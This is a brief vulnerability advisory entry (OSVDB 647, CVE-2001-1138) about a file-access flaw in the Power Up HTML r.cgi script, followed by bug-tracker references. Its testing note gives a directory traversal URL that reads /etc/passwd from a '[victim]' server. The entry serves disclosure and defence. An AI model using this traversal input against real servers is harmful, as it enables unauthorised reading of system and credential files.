Power Up HTML r.cgi FILE Variable Traversal Arbitrary File Access

2001-09-07T00:00:00
ID OSVDB:647
Type osvdb
Reporter OSVDB
Modified 2001-09-07T00:00:00

Description

Manual Testing Notes

http://[victim]/cgi-bin/powerup/r.cgi?FILE=../../../../../etc/passwd

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-09/0042.html ISS X-Force ID: 7092 CVE-2001-1138 Bugtraq ID: 3304